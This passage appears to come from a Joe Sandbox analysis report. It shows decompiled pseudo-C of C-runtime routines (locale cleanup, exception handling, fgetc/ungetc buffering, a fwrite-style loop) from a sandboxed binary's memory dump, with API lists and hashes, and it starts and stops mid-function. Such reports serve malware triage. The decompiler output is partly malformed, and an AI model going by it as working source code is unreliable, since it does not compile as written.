                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *((intOrPtr*)(_t67 - 4)) != 0) {
                                                                                                                                                                                                        							_t21 = _t67 + 4; // 0x51c0be0f
                                                                                                                                                                                                        							_t28 =  *_t21;
                                                                                                                                                                                                        							if(_t28 != 0) {
                                                                                                                                                                                                        								_t90 =  *_t28;
                                                                                                                                                                                                        								if( *_t28 == 0) {
                                                                                                                                                                                                        									_push(_t28);
                                                                                                                                                                                                        									E00406C4C(0, _t67, _t69, _t90);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t67 = _t67 + 0x10;
                                                                                                                                                                                                        						_t22 =  &_a4;
                                                                                                                                                                                                        						 *_t22 = _a4 - 1;
                                                                                                                                                                                                        						_t91 =  *_t22;
                                                                                                                                                                                                        					} while ( *_t22 != 0);
                                                                                                                                                                                                        					_push(_t69);
                                                                                                                                                                                                        					return E00406C4C(0, _t67, _t69, _t91);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t3 = _t69 + 0xb0; // 0x84dff03
                                                                                                                                                                                                        					_t44 =  *_t3;
                                                                                                                                                                                                        					if(_t44 != 0 &&  *_t44 == 0) {
                                                                                                                                                                                                        						_t4 = _t69 + 0xb8; // 0x43ffffff
                                                                                                                                                                                                        						_t45 =  *_t4;
                                                                                                                                                                                                        						if(_t45 != 0) {
                                                                                                                                                                                                        							_t77 =  *_t45;
                                                                                                                                                                                                        							if( *_t45 == 0) {
                                                                                                                                                                                                        								_push(_t45);
                                                                                                                                                                                                        								E00406C4C(0, _t65, _t69, _t77);
                                                                                                                                                                                                        								_t5 = _t69 + 0xbc; // 0x75ff3e83
                                                                                                                                                                                                        								E004101C8( *_t5);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t6 = _t69 + 0xb4; // 0x7de8cf8b
                                                                                                                                                                                                        						_t46 =  *_t6;
                                                                                                                                                                                                        						if(_t46 != 0) {
                                                                                                                                                                                                        							_t79 =  *_t46;
                                                                                                                                                                                                        							if( *_t46 == 0) {
                                                                                                                                                                                                        								_push(_t46);
                                                                                                                                                                                                        								E00406C4C(0, _t65, _t69, _t79);
                                                                                                                                                                                                        								_t7 = _t69 + 0xbc; // 0x75ff3e83
                                                                                                                                                                                                        								E0040FFB9( *_t7);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t8 = _t69 + 0xb0; // 0x84dff03
                                                                                                                                                                                                        						_push( *_t8);
                                                                                                                                                                                                        						E00406C4C(0, _t65, _t69, _t79);
                                                                                                                                                                                                        						_t9 = _t69 + 0xbc; // 0x75ff3e83
                                                                                                                                                                                                        						_push( *_t9);
                                                                                                                                                                                                        						E00406C4C(0, _t65, _t69, _t79);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aae
                                                                                                                                                                                                        0x00408ab9
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x00408997
                                                                                                                                                                                                        0x0040899d
                                                                                                                                                                                                        0x0040899d
                                                                                                                                                                                                        0x004089a5
                                                                                                                                                                                                        0x004089a7
                                                                                                                                                                                                        0x004089a9
                                                                                                                                                                                                        0x004089ab
                                                                                                                                                                                                        0x004089ac
                                                                                                                                                                                                        0x004089b1
                                                                                                                                                                                                        0x004089b7
                                                                                                                                                                                                        0x004089bd
                                                                                                                                                                                                        0x004089a9
                                                                                                                                                                                                        0x004089be
                                                                                                                                                                                                        0x004089be
                                                                                                                                                                                                        0x004089c6
                                                                                                                                                                                                        0x004089c8
                                                                                                                                                                                                        0x004089ca
                                                                                                                                                                                                        0x004089cc
                                                                                                                                                                                                        0x004089cd
                                                                                                                                                                                                        0x004089d2
                                                                                                                                                                                                        0x004089d8
                                                                                                                                                                                                        0x004089de
                                                                                                                                                                                                        0x004089ca
                                                                                                                                                                                                        0x004089df
                                                                                                                                                                                                        0x004089df
                                                                                                                                                                                                        0x004089e5
                                                                                                                                                                                                        0x004089ea
                                                                                                                                                                                                        0x004089ea
                                                                                                                                                                                                        0x004089f0
                                                                                                                                                                                                        0x004089f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408997

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ___free_lc_time___free_lconv_mon___free_lconv_num
                                                                                                                                                                                                        • String ID: x-B
                                                                                                                                                                                                        • API String ID: 1156122516-492542633
                                                                                                                                                                                                        • Opcode ID: 07e95b2470654b56678c1bc6ff5b4bb992fb34b1b314214da6c134c30319a2a4
                                                                                                                                                                                                        • Instruction ID: a99e5749659e9c2460926f20187b856dc92dc98678e4cb8a4d7f7645dcd8d333
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07e95b2470654b56678c1bc6ff5b4bb992fb34b1b314214da6c134c30319a2a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C31A2722043419FEB24BF64DA81A6777A6EB00314F15083FE585B76A1CF3DAC50CA2D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                                                        			E004082AE(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t23 = __ecx;
                                                                                                                                                                                                        				_t22 = __ebx;
                                                                                                                                                                                                        				_t30 = _a20;
                                                                                                                                                                                                        				if(_a20 != 0) {
                                                                                                                                                                                                        					_push(_a20);
                                                                                                                                                                                                        					_push(__ebx);
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					E0040821C(__ebx, __edi, __esi, _t30);
                                                                                                                                                                                                        					_t28 = _t28 + 0x10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t31 = _a28;
                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                        				if(_a28 != 0) {
                                                                                                                                                                                                        					_push(_a28);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(_t27);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00404949(_t23);
                                                                                                                                                                                                        				_push( *_t26);
                                                                                                                                                                                                        				_push(_a16);
                                                                                                                                                                                                        				_push(_a12);
                                                                                                                                                                                                        				_push(_t27);
                                                                                                                                                                                                        				E00407C86(_t22, _t25, _t26, _t27, _t31);
                                                                                                                                                                                                        				_push(0x100);
                                                                                                                                                                                                        				_push(_a24);
                                                                                                                                                                                                        				_push(_a16);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                                                        				_push(_t27);
                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                        				_t20 = E00407F01(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00404910(_t20, _t27);
                                                                                                                                                                                                        					return _t20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00408304
                                                                                                                                                                                                        0x00408307
                                                                                                                                                                                                        0x00408311
                                                                                                                                                                                                        0x00408315
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408315
                                                                                                                                                                                                        0x0040831b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 004082C1
                                                                                                                                                                                                          • Part of subcall function 0040821C: ___BuildCatchObjectHelper.LIBCMT ref: 00408252
                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004082D8
                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 004082E6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                        • API String ID: 2163707966-1018135373
                                                                                                                                                                                                        • Opcode ID: 27eecc3899bbe1063533d20d8d1912ab6fac83b2e668249a59cd09534d133364
                                                                                                                                                                                                        • Instruction ID: 1dfc0ea3400c4455fdf0f17d03e66b9e07ee6fd977abe97b374ecae1b492f4c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27eecc3899bbe1063533d20d8d1912ab6fac83b2e668249a59cd09534d133364
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0186B1000109BBDF126F52CD01EAB3F2AEF48354F00402AFD48212A1DB3A98B1DBA9
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                        			E0040B1DD() {
                                                                                                                                                                                                        				signed long long _v12;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				signed long long _v28;
                                                                                                                                                                                                        				signed char _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					_v20 =  *0x4224d8;
                                                                                                                                                                                                        					_v28 =  *0x4224d0;
                                                                                                                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                        					asm("fld1");
                                                                                                                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                        					asm("fnstsw ax");
                                                                                                                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                        					if(__eax == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						return __eax;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00404587), ref: 0040B1E2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040B1F2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                                                        • Opcode ID: 8617d92d3f2ccbb5be22d6de85dfeec639d68f29d2bcc8af3ae5310be24a9569
                                                                                                                                                                                                        • Instruction ID: f0c37bf17db3da10c81435578386e460196ae04845272ef35ed2d2751b5da840
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8617d92d3f2ccbb5be22d6de85dfeec639d68f29d2bcc8af3ae5310be24a9569
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87F01D30A10A09E2DF102BA1BD0E66F7A75FB80746FD104A1E592F00D4DF7590B6929E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                        			E00403CA3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v88;
                                                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0x44);
                                                                                                                                                                                                        				E00406CE9(E00417370, __ebx, __edi, __esi);
                                                                                                                                                                                                        				E00401030( &_v48, "invalid string position");
                                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                        				_t19 =  &_v88;
                                                                                                                                                                                                        				E00403C1C(_t19,  &_v48);
                                                                                                                                                                                                        				E00404EFB( &_v88, 0x424b90);
                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t22 = _t19;
                                                                                                                                                                                                        				E00401DE0(_t19, _v16);
                                                                                                                                                                                                        				 *_t22 = 0x421ad4;
                                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00403CAA
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403CC7
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403CD5
                                                                                                                                                                                                          • Part of subcall function 00404EFB: RaiseException.KERNEL32(?,?,00406831,004021F3,?,?,?,?,00406831,004021F3,00424938,0042A754,004021F3,00000000,00000000), ref: 00404F3D
                                                                                                                                                                                                          • Part of subcall function 00401DE0: std::exception::exception.LIBCMT ref: 00401DEE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • invalid string position, xrefs: 00403CAF
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID: invalid string position
                                                                                                                                                                                                        • API String ID: 3355147766-1799206989
                                                                                                                                                                                                        • Opcode ID: 35ab4fa941d0f0b355e05e4954304598f0911735ceef2f24eda3913f4f812397
                                                                                                                                                                                                        • Instruction ID: 2f2ca15ef77ba88ce936d0c0f6117db976c3df226251c88510fed455a64c03ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35ab4fa941d0f0b355e05e4954304598f0911735ceef2f24eda3913f4f812397
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF0307664021CABCB10EAD2D841ACEBB7CEF50365F50403BF640B6596DAB9D940D7A8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E004030D4(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t123 = __edi;
                                                                                                                                                                                                        				_t122 = __edx;
                                                                                                                                                                                                        				_t95 = __ebx;
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				E00406D52(E00417208, __ebx, __edi, __esi);
                                                                                                                                                                                                        				_t129 = __ecx;
                                                                                                                                                                                                        				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
                                                                                                                                                                                                        					_t52 =  *(_t129 + 0x4c);
                                                                                                                                                                                                        					__eflags = _t52;
                                                                                                                                                                                                        					if(_t52 != 0) {
                                                                                                                                                                                                        						__eflags =  *(_t129 + 0x3c);
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							E00401000(_t130 - 0x2c);
                                                                                                                                                                                                        							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                        								_push( *(_t129 + 0x4c));
                                                                                                                                                                                                        								_t54 = E00406DAB(_t95, _t122, _t123, _t129, __eflags);
                                                                                                                                                                                                        								__eflags = _t54 - 0xffffffff;
                                                                                                                                                                                                        								if(_t54 == 0xffffffff) {
                                                                                                                                                                                                        									break;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00402330(_t95, _t130 - 0x2c, _t123, _t129, 1, _t54);
                                                                                                                                                                                                        								_t58 = E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x44));
                                                                                                                                                                                                        								_t95 = _t58;
                                                                                                                                                                                                        								_t61 = E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x64));
                                                                                                                                                                                                        								_t122 =  *( *(_t129 + 0x3c));
                                                                                                                                                                                                        								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
                                                                                                                                                                                                        								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
                                                                                                                                                                                                        								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
                                                                                                                                                                                                        								__eflags = _t67;
                                                                                                                                                                                                        								if(_t67 < 0) {
                                                                                                                                                                                                        									break;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t123 = 1;
                                                                                                                                                                                                        									__eflags = _t67 - 1;
                                                                                                                                                                                                        									if(_t67 <= 1) {
                                                                                                                                                                                                        										_t106 = _t130 - 0x2c;
                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
                                                                                                                                                                                                        										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
                                                                                                                                                                                                        											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E004028A7(E0040306F(_t106, _t130 - 0x54));
                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                        												__eflags = _t123;
                                                                                                                                                                                                        												if(_t123 <= 0) {
                                                                                                                                                                                                        													goto L23;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_push( *(_t129 + 0x4c));
                                                                                                                                                                                                        												_t123 = _t123 - 1;
                                                                                                                                                                                                        												__eflags = _t123;
                                                                                                                                                                                                        												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
                                                                                                                                                                                                        												E004070AC(_t95, _t122, _t123, _t129, _t123);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											goto L23;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E004028A7(E0040306F(_t106, _t130 - 0x5c));
                                                                                                                                                                                                        											E00401720(_t95, _t130 - 0x2c, 1, _t129, 0,  *((intOrPtr*)(_t130 - 0x34)) - E004028A7(E0040306F(_t106, _t130 - 0x5c)));
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t67 - 3;
                                                                                                                                                                                                        										if(_t67 != 3) {
                                                                                                                                                                                                        											break;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
                                                                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												E00406A4A(_t95, _t83, _t130 - 0x2d, 1, E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x4c)), 1);
                                                                                                                                                                                                        												L23:
                                                                                                                                                                                                        												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L19:
                                                                                                                                                                                                        								E004011C0(_t130 - 0x2c, 1, 0);
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t129;
                                                                                                                                                                                                        							goto L19;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t52 = E00402E57(__eflags, _t130 - 0x2d, _t52);
                                                                                                                                                                                                        							__eflags = _t52;
                                                                                                                                                                                                        							if(_t52 == 0) {
                                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                                                                                                                                                                                        					_t129 =  *(__ecx + 0x20);
                                                                                                                                                                                                        					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L3:
                                                                                                                                                                                                        				return E00406D9C(_t95, _t123, _t129);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004030DB
                                                                                                                                                                                                        • _fgetc.LIBCMT ref: 00403211
                                                                                                                                                                                                          • Part of subcall function 00402330: std::_String_base::_Xlen.LIBCPMT ref: 0040234A
                                                                                                                                                                                                        • _memcpy_s.LIBCMT ref: 004031D6
                                                                                                                                                                                                        • _ungetc.LIBCMT ref: 0040325C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 9762108-0
                                                                                                                                                                                                        • Opcode ID: f117f6bada6efc273c9a359eb13dd19cdfb91ab3bb1de83bf946f7ac03b1af4b
                                                                                                                                                                                                        • Instruction ID: 9fa00fa45d3d0fe1768d41eb2a58fbeec1902a854fe537b5d35af1df4defd993
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f117f6bada6efc273c9a359eb13dd19cdfb91ab3bb1de83bf946f7ac03b1af4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3515E329042089BCB14EFB9D8419EEBBB9AF48315F10453FE152F72D1DA78EA44CB64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E00407402(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040BD80(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040E3B6(_t90, _t98, _t100));
